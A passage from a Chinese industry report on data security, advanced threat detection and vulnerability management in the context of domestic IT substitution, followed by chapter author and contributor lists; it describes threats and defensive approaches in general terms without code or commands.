风险检测与响应、不当云配置风险、云内边界防护、云内NDR 等;对于云 上隔离与访问控制,重点关注零信任云应用/SaaS 接入、零信任应用与API 访问控制、容器和微服务零信任、云主机零信任微隔离、云内零信任网关等。 (4)自适应的安全防护 通过构建云应用开发平台、云安全管理平台等核心能力,对技术和运营 流程实现自我迭代升级,弹性扩充能力栈,实现云上云下安全能力一体化演 进 。 本章主笔人员: 北京小佑网络科技有限公司袁曙光、白黎明、任亚周 本章贡献人员(按公司名称拼音排序): 北京启明星辰信息安全技术有限公司田建丽 北京山石网科信息技术有限公司任亮 北京神州绿盟科技有限公司姜紫琪、刘丽 北京天融信网络安全技术有限公司夏威 北京信安世纪科技股份有限公司焦靖伟 北京长亭科技有限公司王兆蒙、李涛 杭州默安科技有限公司王阔阔 湖南麒麟信安科技股份有限公司杨鹏举 精壹致远(武汉)信息技术有限公司李勇、杜雍新 科来网络技术股份有限公司左坚 深信服科技股份有限公司卢柏安 中国移动通信集团有限公司江为强、徐思嘉 17.数据安全 当前,数字经济正在引领新一轮经济周期,成为经济发展的新引擎。数 据作为国家基础性战略资源,在其全生命周期中面临的暴露面(风险)越来 越大。数据处理活动快速发展,数据应用场景日益多样化,数据安全的外延 不断扩大。同时,由于国家对数据安全的重视程度不断提高,组织面临的数 据安全合规监管要求也越来越严格。在安全风险与合规监管双重驱动下,数 据安全工作得到了快速发展。然而,数据的动态属性极大地提高了安全防护 工作的复杂度。如何实现数据安全与应用场景(全生命周期)的深度融合, 是数据安全需要关注的重要课题。 17.1 国产化在数据生命周期的各个阶段都提出新的安全课题 数字化转型以及新型数字基础设施建设打破了数据原有静态的固有应用 模式。通过多场景、多主体的数据协同,提升数据应用价值逐渐成为业界的 共识。在此背景下,数据跨系统、跨边界、跨组织流动越来越频繁。数据在 其全生命周期内,面临着技术层面和法律层面双重的风险,并且这种风险越 来越大。另外,自主创新的基础软硬件也为处于产业链下游的数据安全产业 带来挑战。 17.1.1 数据采集活动对数据安全提出新要求 在数据采集环节,数据安全风险涵盖保密性、完整性、可用性,以及超 范围采集用户信息等。在自主创新的大背景下,数据采集工具、元数据管理 工具、数据采集环境等开始国产化。信息系统运行环境的差异化、接口的多 样化对数据采集和与之相关的安全措施(包括但不限于数据采集的身份认证、 数据的完整性校验、数据的可用性保护),带来了工作量和复杂度方面的巨 大挑战。 17.1.2数据存储活动依赖 IT 基础设施导致数据孤岛 数据广泛存在于各类系统之中,与云平台、网络、服务器、存储、操作 系统、数据库等IT 基础设施紧密相关。由于国产IT 基础设施技术标准的缺失, 国产化替代后很容易产生数据孤岛效应。数据孤岛中数据生成和使用呈指数 级增长,数据安全技术与基础设施之间的独立使得当前的数据安全防护体系 无法适应数据存储活动。 17.1.3 数据使用活动对数据安全要求更高 数据使用环节既要求数据使用的安全性又要保证数据使用的时效性,涉 及的数据安全技术比较多。自主创新推动了数实融合的快速发展,也带来了 更加庞大、繁杂的数据使用场景,不同行业的数据安全访问、安全监管制度 水平不一,用户的身份认证和识别、特权账号的安全管控,以及各类计算组 件之间的配同都越来越复杂,这对数据安全提出了更高的防护要求。 17.1.4数据加工安全难以保障 在数据加工的阶段,不同的数据被整合利用,实现了从封闭式管理走向 开放式治理、从静态化管理走向流动性治理、从精细化管理走向精准化治理、 从网格化管理走向网络化治理、从单向度管理走向协同化治理的路径转向。 近年来我国在自主可控计算机基础软硬件研发、应用及生态链建设等方面 已初见成效,实现了数据加工处理活动部分场景的全国产化替代。然而, 原有的数据加工安全保护措施,受到现有基础设施环境的限制,数据安全 保护手段难以实施,比如数据访问控制措施在自主创新环境下不能够有效 部署、数据清洗手段在现有应用环境中不能有效融合,导致数据加工安全 难以保障。 17.1.5 数据传输安全技术亟待突破 在数据传输过程中,数据安全设备较多采用旁路部署方式。加密技术作 为保护数据传输安全的重要手段,能够保护数据不被窥视,阻止攻击者窃取 信息、应用或口令。反之,攻击者也会借助加密流量实施恶意攻击,产生更 具破坏性的行为。传统流量镜像模式下,加密流量导致明文信息不足,载荷 不能作为识别加密流量的特征,包长序列、包到达时间等特征也不足以区分 不同的加密流量,可用特征维度显著减少,高辨别力特征更加稀有,如何在 旁路模式下解析加密数据,也成为数据传输安全需要解决的问题。 17.2 数据安全与应用场景融合面临诸多困难 17.2.1 标准体系缺失导致数据安全与应用场景融合困难 基础设施层面,国产数据库等基础软硬件发展迅速,但相关基础环境标 准尚不完善,生态建设缺乏有效引导,各自为战的状态导致数据安全技术与 应用场景的融合遇到很大困难。在数据层面,数据采集、数据应用等关键环 境尚缺乏统一、完善的标准体系,数据孤岛效应比较明显。因此,亟需建立 统一标准和顶层归集,以改善接口不统一所引起的数据互联障碍。 17.2.2 国产化适配工作量巨大导致厂商负担过重 我国基础软硬件产业技术路线繁多、研发方向分散,给下游的信息系统 集成适配带来了非常大的工作量和困难。数据安全厂商基本处于产业链的末 端,在国产化大环境下除了点对点的逐一适配几乎没有其他可行的方式。这 导致数据安全厂商面临着适配压力大、成本高的难题。 17.2.3 国产化版本性能下降导致拓展应用领域受阻 国内基础软件和应用软件厂商之间缺乏合作,关键软硬件兼容性标准和 应用开发接口不规范的情况较为普遍。由于缺少针对国产基础软硬件集成适 配的优化,导致国产化迁移后操作系统I/O 效率、数据库缓存命中率、网络 吞吐量、复杂页面交互效率等都大幅下降。国产化的数据安全产品也不可避 免地存在性能下降问题,这就导致国产化版本在政策性市场之外的推广阻力 重重。 17.2.4 应用场景复杂导致数据安全与应用融合缓慢 首先,便捷、高效、多样化的业务服务,导致整体业务环境将更加开放, 业务生态将更加复杂,参与提供数据服务和应用服务的角色也将更加多元。 众多的应用给使用人员以及服务提供方带来了复杂的身份和权限管理问题, 确保所有人员合法合规访问被授权的业务应用和数据资源成为挑战。其次, 数据的共享、交换、流转等形式变得日趋复杂,贯穿于数据处理活动各个阶段。 越来越多的数据实现跨层级、跨地域、跨系统、跨部门、跨业务的互联互通 和协同共享,大量新的技术和信息、数据、设施、设备被互联互通和广泛应用, 对于数据本身安全风险也随之加剧。将数据安全防护手段与现有的应用系统 进行集成,最小化其对原有系统的影响或者不影响其现有应用,成为了当下 数据安全厂商面临的难题,同时应用场景愈加复杂导致数据安全与应用融合 进展缓慢。 17.3 数据安全应坚持走与业务场景融合之路 17.3.1 完善相关标准,推进生态建设 基础软硬件作为产业链上游,对下游有巨大的影响。当前, 自主创新的 数据安全产业面临的很多问题,都来源于产业链上游。因此,建议从全局的 角度适度收敛基础软硬件的技术路线,扶持自主创新程度高、市场潜力大的 重点企业,形成核心技术发展合力。同时,统一国产基础软硬件技术标准, 汇聚产业资源,推动自主创新的产品和技术在更多领域应用推广。 17.3.2 加大适配工作投入,提高适配工作效率 数据安全技术与国产化基础软硬件环境的融合重要且迫切。在外部环境 尚未改变的情况下,数据安全企业需要坚定信心、加大适配工作投入。 一方 面逐步完善数据安全产品与国产化环境的融合;另一方面探索建立集中化、 权威性的适配中心,从点对点适配向点对面多层次适配转变,降低适配工作 量、提高适配效率。 17.3.3 促进数据库安全漏洞研究和生态建设 随着国产数据库的快速发展,出现大量的安全漏洞在所难免。目前,各 级漏洞库平台关于国产数据库的漏洞较少,这恰恰是国产数据安全厂商的机 遇。加强对数据库重要功能的设计缺陷研究,通过建立DevSecOps 机制,通 过将安全性集成到软件开发生命周期的每个阶段,对代码进行审查、审计、 扫描和测试以发现安全问题,实现安全漏洞的快速发现和及时管理,从而降 低漏洞的被利用时间,帮助数据库厂商解决数据库安全漏洞。 17.3.4立足现有技术,通过解决方案创新促进应用场景融合 根据行业数据特点,立足现有技术手段,充分适应应用场景的安全需求, 有针对性地开展解决方案的创新研究,促进数据安全技术与应用场景的融合。 在应用引领下,加快全面化、立体化、多维度的数据安全产品体系发展,形 成数据安全与应用场景的创新融合迭代发展能力。 本章主笔人员: 北京中安星云软件技术有限公司郑金、赵卫国 深圳昂楷科技有限公司官文兵 本章贡献人员(按公司名称拼音排序): 安天科技集团股份有限公司徐辰福 北京安御道合科技有限公司谢依夫 北京得意音通技术有限责任公司黄小妮 北京东方通网信科技有限公司孙玉红 北京炼石网络技术有限公司白小勇、张齐军 北京启明星辰信息安全技术有限公司蒋发群 山石网科通信技术有限公司李莅 北京神州绿盟科技有限公司王晓丹 北京时代化信科技股份有限公司沙勇 北京天融信网络安全技术有限公司张志颖、包英明、周雨菲 广东安证计算机司法鉴定所魏智煌 国网智能电网研究院有限公司王齐 杭州安恒信息技术股份有限公司聂桂兵 杭州世平信息科技有限公司顾益宇 杭州亿格云科技有限公司陈吴栋、吕刚超 河北省数据科学与应用重点实验室陈学斌 科来网络技术股份有限公司张津 南京南瑞信息通信科技有限公司陈登洲、祁龙云、孙连文 三未信安科技股份有限公司张驰 上海众人智能科技有限公司付宗玉 西安电子科技大学杭州研究院孙建国 浙江远望信息股份有限公司陈旭 中国移动通信集团有限公司杨亭亭、耿慧拯 18.高级威胁检测 高级威胁通常出于商业或政治动机,针对特定组织或国家,并要求在长 时间内保持高隐蔽性。近年来,高级威胁攻击事件影响不断扩大,攻击手段 更加隐蔽,尤其是在自主创新的背景下产生了更多针对性的攻击手段,攻防 检测对抗持续升级。 18.1 国产化背景下高级威胁检测对抗持续升级 18.1.1 高级威胁攻击门槛降低但影响巨大 从国内外各机构对高级威胁攻击活动的持续跟踪和分析结果可以看到, 近年来攻击组织使用的战术、技术和过程已经达到非常成熟的阶段,即便部 分技术能力不高的组织也能利用公开脚本类或自动化攻击框架快速形成完备 的攻击武器。网络犯罪分子往往持有最新的零日漏洞、商业级的工具包以及 社会工程技术,能够针对重要目标发起高隐蔽攻击。 2022年9月5日,国家计算机病毒应急处理中心和网络安全厂商发布 相关分析报告,曝光源自美国NSA(TAO) 针对西北工业大学的网络攻击活 动。TAO 使用了40余种不同的NSA 专属网络攻击武器,对中国国内的网络 目标实施了上万次的恶意网络攻击,控制了数以万计的网络设备,窃取了超 过140GB 的高价值数据。 18.1.2 面向国产化平台的高级威胁研究处于早期阶段 随着网信自主创新工作的不断推进,针对国产化应用、操作系统和中间 件等的攻击接踵而来。过去针对国际供应链及相关业务系统所做的安全分析 与研究成果,无法直接迁移应用于国产化环境。在端点侧,国产应用和操作 系统存在大量未知漏洞,这进一步放大了国产化端点的潜在威胁。在网络侧, 基于国产化基础实施搭建的公有网络基础设施、企业网与行业专网等,面临 着加密流量、隐蔽隧道等高级攻击。在云端侧,搭建在云上的各类国产化应用、 中间件、操作系统、数据库以及国产化云平台本身,将成为攻击者重点关注 的对象。 另外,在国产化网络安全建设方面,过去主要聚焦在传统硬件网关设备 的替换,各类安全产品间孤岛现象严重,无法形成整体性安全解决方案,难 以应对针对国产化环境下的攻防对抗和安全管理需求,所以目前基于国产化 环境的安全研究还处于较早期阶段。 18.1.3 现有高级威胁检测能力发挥了作用但并不理想 大多数机构会在边界处部署防火墙、IDS 、WAF 等流量检测设备,在主 机终端侧部署主机安全产品进行主机加固与安全检测,部分企业会针对性地 加强内部审计能力,从而在主机层与网络层形成纵深防护体系。这些安全产 品各司其职,通常针对网络侧和端点侧的已知威胁有较好的防护能力,能发 现一系列未知攻击、提高攻击门槛。但是,当面临有组织有规模的APT 攻击时, 这些防护思路在实际应用上效果并不理想。 部分对安全性要求更高的重点领域,会应用高级威胁防护产品(如 RASP、沙箱、邮件网关、蜜罐和内存保护等)加强其关注方向的安全能力。 这些产品通常不需要基于特征或签名检测威胁,在实际应用中成功抵御 了一些高级威胁攻击。但目前的高级威胁检测大多主要集中在某一个孤 立的视野方向,安全产品聚焦在端点层面或网络层面的能力。随着各类 高级攻击不断升级和变化,从单一端点或网络侧很难完整还原整个攻击 过程,这种技术思路无法形成协同检测分析合力,不再适用于新的安全 威胁形势。 113. 18.2 现阶段高级威胁检测问题分析 18.2.1现有产品检测能力不足,对特定场景关注不够 顶尖的高级威胁攻击通常具有非常丰富的隐蔽手段和技巧,包括但不 限于合法商业软件的利用、分享暗藏后门的工具、复杂的加解密和反追踪技 巧等。这些攻击手段都是专门为了避开传统的检测手段而设计的,在这类高 隐蔽性的高级威胁攻击面前,许多检测手段都略显乏力。比如已经披露的 SolarWinds 供应链攻击,其使用的恶意代码具备数字签名并借助于合法商业 软件启动,可绕过基于黑名单的拦截,且恶意代码和攻击者通信时模仿正常 的通信行为,常规流量特征难以检测。又如 Lazarus, 其通过分享存在恶意 代码的编译文件和暗藏后门的破解版安全工具,用来定向攻击安全研究员。 再如美国NSA 方程式的顶级后门Bvp47, 其包含了复杂的代码、区段加解密, Linux 多版本平台适配和丰富的rootkit 反追踪技巧,是一个从密码学、网络、 Linux 操作系统等多个层面上构建出来的高级攻击体系。 在国产化建设的背景下,高级威胁攻击呈现出更强的针对性,但大多 数安全产品并未对以下场景进行优化。 一是漏洞利用场景:由于国产化基础 设施与应用的出现和使用时间不长,攻击者可发掘和利用的漏洞更多。二是 Webshell加密通信场景:随着攻防对抗的日趋激烈,Webshell 工具也从早期 的明文通信(如菜刀)演进到加密通信(如冰蝎、蚁剑、哥斯拉),甚至是 内存马通信,恶意特征越来越少,且加密的方式和手法都可以根据攻击者自 定义的方法动态变化,这给检测防御带来了极大的技术挑战。三是C2 外联 场景:利用国产化OS、 数据库、中间件和各类应用可能存在的ODay 漏洞, 攻击者可以快速攻陷目标网络并建立C2 连接。在攻击者的刻意伪装下,这 些流量和普通的业务连接流量区别很小,不再有诸如入侵流量的漏洞利用技 术等特征,同时攻击者还会结合一些编码、加密等技术手段,隐藏流量内容。 四是挖矿攻击场景:虚拟货币挖矿经过几年的演进已经从一开始的明文挖矿 转为加密挖矿,且很多矿池会经常更换IP地址且不通过域名的方式进行挖矿。 18.2.2 单一手段对高级威胁防护效果不佳 持续进化的高级威胁带来了更复杂的攻击场景,单点的检测手段已经越 来越难以应对新型的攻击体系。近年来随着人工智能技术的发展,攻击方在 扫描、利用、破坏等攻击工具中开始使用人工智能技术,通过多个工具在不 同层面同时发起攻击。这对高级威胁检测手段提出了更大挑战。 由于不同类型攻击特点的不同,表现为在不同层面检测的难易度也不尽 相同。对于内存马攻击可以用RASP 检测,类似“永恒之蓝”之类的 RPC 漏洞更适合在网络侧检测,横向移动等攻击场景由于协议的加密问题更适合 在端点侧检测,而漏洞利用问题更适合在内存或内核层进行检测。这就需要 不同类别的安全产品互相配合,弥补自身在某一个检测方向上的短板。但高 级威胁检测产品种类繁多,缺乏统一的标准规范,这为安全产品之间的数据 与检测能力的合力设立了障碍。 18.3 高级威胁检测向新技术与联合防护方向发展 18.3.1 高级威胁需要多层次互补的联合防护 过去的高级威胁攻击事件提示我们,攻击者已经不局限于单一的攻击方 式,而是展开全方位立体式的攻击。从软件到硬件、从云到端,攻击者已经 将各种攻击方式串联起来,形成了更加复杂的攻击场景,并且攻击路径和时 间都相对较长。 基于上述攻防事实,实战化攻防体系中对高价值事件的发现、攻击链的 还原提出了越来越多的要求。为应对高级威胁攻击行为涉及多种途径的情况, 迫切需要构建多层次互补的立体化联合防护体系。通常攻击者会长期潜伏在 受害者内网中,从DMZ 区到办公区再到核心区可能都会遍布攻击者的足迹, 这就需要在网络边界、内网、端点、内存等任何需要监控的环节都部署相应 的安全产品。各类检测手段分层发挥各自的优势能力,同时各产品之间需要 数据标准打通,通过协同联动完成对全攻击过程的监控和防御。 18.3.2通过内存与程序行为分析进行高级威胁拦截 恶意代码是无穷的,但恶意行为是收敛的,通过对进程关键行为路径 等特征信息进行综合分析可以更好地发现已知与未知威胁。根据冯·诺伊曼 体系结构,所有的程序都会经过CPU 进行运算,所有的数据都会经过内存 进行读取。所以通过基于内存访问行为集和程序执行行为集进行行为关联分 析,可以从底层保护系统和程序运行时的安全。该技术一方面对内存读、写、 执行行为进行监控,另一方面对内存中的内核态和应用态的程序执行时敏感 行为进行监控,通过攻击行为链检测与响应技术综合分析监控点,从而检测 ODay 漏洞利用、内核级后门等高级威胁攻击。 同时,在发现高级威胁攻击时应智能对恶意行为进行拦截,并需要依据 进程、网络及文件关系对攻击过程的行为链和时间线进行还原,帮助用户更 清晰的了解事件全过程,实现有效防护、有效溯源,为攻击事件的排查、分 析和复盘提供有力依据。 18.3.3 通过蜜罐与零信任进行高级威胁捕获 蜜罐技术通过在网络中故意放置易受攻击的虚假目标来吸引攻击者,并 且记录和分析攻击行为,从而发现高级威胁。结合博弈论、人工智能等理论, 可以提高蜜罐系统的自适应性和欺骗能力,让攻击者陷入更加复杂的欺骗环 境中,从而使攻击者的攻击成本提高,进而达到拖延攻击者的目的。此外, 结合网络虚拟化、软件定义网络、云计算等技术,可以更加灵活和高效地构 建蜜罐环境,提高蜜罐系统的可用性和可靠性。特别是利用虚拟机自省技术, 可以快速将被攻击的虚拟系统转移至高保真虚拟版网络副本,使攻击者无法 继续攻击真实目标,从而保护真实系统的安全。 同时零信任技术可以与蜜罐技术联合使用,利用零信任技术实现对后端 业务系统的隐藏,对提供应用服务的设备进行隐身保护,同时部署蜜罐模拟 业务正常应用,使用诱饵和虚假用户路径来吸引攻击者并检测高级攻击。 18.3.4通过高效情报进行高级威胁狩猎 越来越多的组织选择使用威胁情报和威胁猎杀来提升高级威胁检测能 力。威胁情报可以提供有关最新威胁的情况,以及攻击者的攻击方式和目标。 威胁猎杀则是通过对威胁情报的分析和利用,主动追踪高级威胁组织,对潜 在的网络攻击进行及时响应和防御。然而,威胁猎杀工作是一个永无止境的 过程,因为网络攻击者的攻击方式和手段一直在不断发展和改进。因此,为 了有效地应对网络攻击,威胁猎杀需要常态化开展,并与其他网络安全工作 相结合,形成完整的网络安全防护体系。 同时,威胁猎杀工作需要有专业的人员和技术支持,由于成本的限制, 组织需要根据其网络的重要程度、现有网络防御设施的防护能力水平等因素, 有针对性地展开威胁猎杀工作。对于一些重要的政府机构、金融机构等组织, 威胁猎杀工作应该是高度重视的,而对于其他一些中小型企业,可以考虑采 取其他较为经济实惠的网络安全措施来降低网络安全风险。 18.3.5 通过网络行为检测进行边界设备保护 网络边界设备是企业网络的第一道防线,但其设备本身也是一种信息系 统,因此也存在着与普通系统一样的安全漏洞问题。攻击者可以利用网络设 备漏洞,如防火墙、路由器、交换机、VPN 等,进入网络并控制网络流量转发, 将其作为持续攻击内网目标的中继站。以中东最大 SWIFT 服务商 EastNets 遭遇的攻击为例,攻击者通过先后击穿外部 VPN 防火墙和内网企业级防火 墙,在防火墙上安装流量转发木马,从而实现了对该企业的控制。 根据全网空间测绘及威胁情报数据持续监测显示,我国互联网网络设备 暴露面大、失陷设备量多,对应的高危漏洞频发且应急响应迟滞。在这种情 况下,需要以网络协议识别解码、高性能流量处理技术为基础,通过旁路部 署在网络边界设备外侧,利用木马心跳、长会话通讯、反弹激活、异常突发 流量等多种高级网络行为检测模型,实现精准发现边界异常网络行为,有效 提升边界攻击的发现和取证能力。 18.3.6 通过AI 赋能提升检测效果 高级威胁检测手段正逐步融合AI 技术,从而在一定程度上提升检出率。 对于文件类高级威胁的检测,可以将恶意代码映射为灰度图像,然后用 这些图像训练深度学习模型,通过识别恶意代码的遗传特征,实现对恶意代 码以及其变种的家族检测,这种方法对于那些经过混淆或加密的恶意代码也 有一定的检测效果。 对于流量类高级威胁的检测,可以通过分析恶意加密流量,构造用于识 别恶意加密流量模式的向量,采用集成学习算法学习流量向量,建立相应的 加密流量检测模型,实现对恶意加密流量的识别。 对于行为类高级威胁的检测,可以实时收集内网资产的镜像流量,然后 通过在线无监督机器学习不断地学习每个子网与资产的日常工作模式。通过 与同类设备横向对比,以及与资产自身历史行为的纵向对比,可以检测对应 资产不符合日常规律的隐蔽异常行为,从而发现高级威胁攻击。 本章主笔人员: 安芯网盾(北京)科技有限公司赵梓蘅、张轩赫、姜向前 安天科技集团股份有限公司邢宝玉 北京金睛云华科技有限公司付彦哲 本章贡献人员( 按公司名称拼音排序): 北京启明星辰信息安全技术有限公司任昊 杭州默安科技有限公司孟瑾、孟瑶 科来网络技术股份有限公司孟召瑞、陈伟清 深信服科技股份有限公司谭运强 中云网安科技有限公司张宏亮、王晓璇 19.漏洞管理 自主创新的网信产品会存在更多的未知漏洞,这已经成为业界的共识, 同时也是当务之急。不同于其他产业节点,从用户侧看,漏洞管理类产品和 解决方案还远未达到理想的覆盖面。因此,本章立足自主创新领域漏洞管理 的纵深发展,从漏洞管理的全流程入手,试着分析开发阶段、修复阶段、管 理阶段的现状和问题,并给出对策建议。 19.1 漏洞管理能力相对滞后 19.1.1 漏洞发现能力滞后于软件开发模式 首先,开源组件的普遍应用导致漏洞数量快速增长。2016年公开的 CVE 数量是10430个,而截止到2022年12月,已公开的CVE 数量已经达 到了17263个。同时,开源软件的普遍应用增加了软件供应链的暴露程度。 国内大多数企业缺少对技术风险、法律风险和供应链风险的认知,缺乏专业 知识和应对经验,大量使用开源软件可能使其攻击面变大。另外,开源组件 的广泛使用,可能会为恶意代码披上“合法”的外衣,从而躲避安全检查。 其次,研发安全管理体系建设不足。目前企业数字应用主要偏重软件功 能、性能的开发,忽视软件开发过程的安全需求、安全设计、安全验证、上 线安全评审等安全开发环节,缺少体系化的安全开发管理体系,最终导致数 字应用软件设计存在安全缺陷或软件存在安全漏洞的情况频发。 第三,传统 AST (应用程序安全测试)工具风险发现能力缺失。传统的 AST 工具在覆盖范围、速度和准确性等指标上滞后于云原生应用程序的需求, 且对现代应用开发和部署体系结构的可见性较差,对于左移风险的发现能力 较弱。另外,当前基于已知漏洞库的安全检测,对于0day 漏洞等未知攻击 缺少检测能力。 19.1.2 漏洞修复模式滞后于开源生态发展 传统 VPT (漏洞优先级技术)评估结果失真,难以进行漏洞优先级的有 效评估。传统的 VPT 主要依赖海量数据进行评级,上下文环境、漏洞情报 的不同都直接影响了其准确性,进而影响漏洞修复工作。另外,开源生态中 的漏洞修复面临时间周期长和有效期短的问题,漏洞挖掘与修复的长期对抗 会是常态。 19.1.3 漏洞治理工作面临安全与效率的两难 首先,漏洞治理工作中存在效率和严谨的矛盾。理想的漏洞运营管理流 程应该在效率和严谨之间取最优解,在保证处置失当和失责概率最小的严谨 限制前提下,最大化提高工作效率。然而,在实践中这样理想的管理流程非 常少见。 其次,漏洞治理工作中存在业务与安全的矛盾。在云管端多协作平台趋 势下,业务侧容易出于效率优先的考虑拒绝或延缓漏洞修复工作。即便安全 管理人员成功推进漏洞修复流程,在开发层面或者业务层面也会遇到阻力, 出现漏洞修复过程反复,甚至拆东墙补西墙的情况。 19.2 缺乏体系化视角是能力滞后的主要原因 19.2.1 漏洞发现的一体化程度不高 在交付规模不断扩大,交付速度越来越高的情况下,由于企业缺少产品、 研发、运维一体化管理,导致漏洞发现能力不足。如在开发阶段对第三方代 码的管理不到位,导致开源漏洞大量引入,进而安全风险加大;或是安全工 具引入的碎片化,导致漏洞威胁难以控制。此外,DevOps 开发模式下易忽 视安全检查,快速迭代过程中引入大量第三方组件,以及容器、微服务等技 术的广泛应用,也会导致新的漏洞危机。 19.2.2 漏洞修复处置判定方法不足 基于静态素材的漏洞评估方案关注的是漏洞的技术严重性,而企业真正 关注的是漏洞会带来的危害。因此静态VPT 技术的评估结果正在失去可参 考性。首先,静态 VPT 方案会将过多的漏洞标记为高优先,在如今资产和 漏洞的数量高速增加的时代,会导致漏洞运营人员工作负担加重。其次,静 态VPT 方案的评估素材多为漏洞原理和利用条件相关的信息,依此得出的 评估结果不具有风险属性,且该评估结果是纯理论性的,有可能会导致安全 团队将大量的时间精力浪费在错误的漏洞上,更严重的结果是忽视了对业务 有重大影响的关键漏洞。再次,传统的安全防护工作是站在防守者的视角来 进行的。不论是漏洞发现、漏洞评估还是漏洞运营,单一防守视角会存在很 大的盲区,可能会忽视多漏洞利用组合而成的攻击链路带来的后果,而这些 正是真实攻击中常见的场景。第四,漏洞管理类产品多聚焦于资产漏洞的发 现和评估,能够很好地发现已知的高危漏洞,对Oday 漏洞和高危漏洞的防 护效果较差。 19.2.3 漏洞治理体系化建设不足 一方面,当前大部分组织采用“发现-修复”的被动式漏洞治理体系。 这存在如下几个问题: 一是缺乏漏洞情报支撑,漏洞处置反应慢;二是缺乏 漏洞治理流程,无法实现漏洞全生命周期的可视、可控和可管闭环全链条。 另一方面,随着数字资产数量剧增,管理难度也越来越高。目前的漏洞 管理系统在梳理海量资产(如主机规模、域名、网段等资产情况)方面能力 不足的情况越来越严重。同时,缺少资产自动识别、资产变更、资产回收的 能力,这也容易导致资产孤岛。 另外,在云原生背景下,只在编码阶段确保没有引入安全风险是不够的。 一旦软件被部署到生产环境,特别是云服务这样的持续运行的在线服务,它 的配置依然有被错误修改的风险。所以我们需要对已经部署到生产环境的软 件和基础设施进行持续监控,确保它们始终处于保护之中。 最后,多数管理类产品在协同处置方面的能力较为单一。新时代的安全 运营更侧重协同响应能力,所有的漏洞或风险都需要响应,但并非所有的漏 洞和风险都能进行修复。多数管理类产品在资产主工作流规范的约束下,漏 洞处置流程单一,只能保障最低限度的可用性。好的安全响应运营体系应该 降低对人员安全能力的高度依赖,以风险管理为核心,针对攻击方法、攻击 链路、攻击态势的变化,及时反馈和动态调整响应策略、技术与手段,不断 发现安全差距、验证控制策略的有效性,实现持续的监测响应。对于一些漏 洞修复比较复杂,无法采用升级方式进行风险消除的场景(如在线业务系统), 在终端提供补丁信息的同时,还需要应用热补丁等技术,结合管理手段,满 足漏洞应急响应与处置闭环的基本要求。 19.3 漏洞管理向漏洞治理方向演进 19.3.1 四管齐下提高漏洞发现能力 (1)实时动态维护软件物料清单 构建软件物料清单是开源组件漏洞管理的基础。通过对每个软件建立开 源组件使用的台账清单,结合开源组件情报信息即可建立有效的跟踪机制。 通过使用SCA (软件成分分析)工具自动化构建软件物料清单( SBOM), 在每次更新软件依赖项或更新漏洞情报库时自动更新 SBOM, 帮助梳理、透 明化软件供应链资产及风险,以发现应用程序中潜在的安全漏洞。在等待更 新版本的软件期间,安全人员可采取临时缓解措施来保护应用程序免受攻击 者利用该漏洞的攻击,还可帮助安全人员在漏洞被披露或核心库发布新版本 时,对应用程序和代码进行抽查以避免出现安全问题。 (2)建设开发过程全链路开源组件漏洞治理能力 将安全嵌入到整个研发流程中,通过应用安全开发闭环设计和组件审 核机制,严格把控并规范在开发过程中开源组件的引入及使用流程。在设计 阶段对需要引入的开源组件进行准入评估,评估维护可以根据企业自身对风 险的偏好、企业能力进行选择;在开发阶段可以通过开源组件源头管控、持 续安全扫描等方式降低开源漏洞风险;在验证阶段对引入的开源组件进行漏 洞识别扫描,并对识别的风险进行处置;在发布阶段对最终的制品交付生成 SBOM 清单,并更新 CMDB (配置管理数据库)作为后续运营阶段的基础数 据。 (3)设定管理卡点,规范完整流程 安全体系建设都是过程化的,在初始阶段应建立流程管控制度,明确安 全漏洞并修复,应用程序上线发布前需要经过安全工具检测;建立应急响应 机制,明确安全预警通报机制、不同类型漏洞处理实效、各方职责等,有序 展开应急工作;在建设阶段完善各开发阶段输入输出标准并转化为技术语言, 融入开发安全过程中,建立需求、设计、编码、测试、应急的完整安全链; 在进阶阶段可以搭建DevSecOps 软件开发生命周期的安全平台,形成全生命 周期的开发安全。 (4)建设高效、可视化的漏洞利用链追溯能力 弥补传统 AST 工具安全防护能力的缺失,着力推进AFL(American Fuzzy Lop)Fuzzing(模糊测试)技术使用。模糊测试是一种针对软件安全 的自动化测试方法,它主要的理念是追寻测试样例的变异,并通过海量的测 试数据来覆盖更多的程序执行流,从而找到更多的安全问题。Fuzzing 不仅 可以找到逻辑类漏洞,还能找到内存破坏的漏洞,比如缓冲区溢出、内存泄漏、 条件竞争等。这本质的原因在于Fuzzing 在做软件安全测试的时候,整体的 粒度会更细,测试点会更多,判断位置也会更精准。 19.3.2 精准化和多元化判定修复漏洞 (1)构建半自动化漏洞处置能力 完全不需要人工介入的全自动化软件修复技术在现阶段还很难实现。可 以结合项目实际情况,采取部分人工干预措施来弥补这种缺陷。根据决定(人 工)采取行动(自动化),应用到观察过程中,然后重复并验证。每一步都 对下一步提供了指导,构成良性循环,通过不断优化安全运营流程以应对不 断变化的安全威胁。 (2)多来源关联漏洞 通过AVC (应用程序漏洞关联)工具优先处理代码中的缺陷并简化应 用程序安全性和漏洞管理流程。在业务系统上线运行后,结合历史漏洞、攻 击事件、威胁情报等信息,主动分析发现、预测漏洞和攻击风险。AVC 把不 同的安全工具所检测到的漏洞,以及人工渗透测试发现的漏洞,通过相关性 分析进行自动关联,进一步确认漏洞是否存在以及漏洞是否被全面修复,并 将风险内容统一汇总到一个报告中展示,让开发人员易于理解,解决了管理 多个安全工具及其报告关联的难题。 (3)利用多种技术手段 VPT 技术结合漏洞的可利用性、资产或业务重要性、威胁情报等数据, 通过高级分析技术,为安全管理人员提供漏洞修复优先级指导,在最短的时 间内利用有效资源进行漏洞修复,减少攻击面。RASP (运行时应用程序自 我保护)技术将保护代码注入到应用程序中,结合应用的逻辑和上下文,对 访问请求的每一段代码进行检测,使应用程序具备自我保护能力。RBVM( 基 于风险的漏洞管理)通过融合威胁和漏洞信息,动态调整漏洞优先级,提高 漏洞管理效率。内存保护技术不依赖于恶意事件、病毒的模式匹配,而是在 内存级别监控应用程序进程,基于程序的动态内存访问行为和程序执行行为 识别威胁,对未知威胁和二进制漏洞有良好的检测效果。 19.3.3 建立漏洞全生命周期治理体系 (1)通过实战攻防加速漏洞管理多元发展 漏洞治理需结合实战攻防加速漏洞管理多元发展,逐步建设体系化的漏 洞管理全生命周期管理体系。首先,要提升资产和漏洞检测覆盖面、检测效 能和自动化程度,逐步形成体系化检测能力。其次,要形成资产和漏洞风险 决策能力,实现数据的统一集中管理并进行数据治理,改变原有的数据分散、 能力分散、无法掌握真实风险态势的状况。同时,要引入优先级排序模型, 快速定位和控制关键风险,合理有序安排管控工作和节奏。最后,要形成整 体的风险快速响应和管控能力。 (2)推动漏洞基建 漏洞基建是以技术为驱动,以安全专家为核心,围绕漏洞生态体系打造 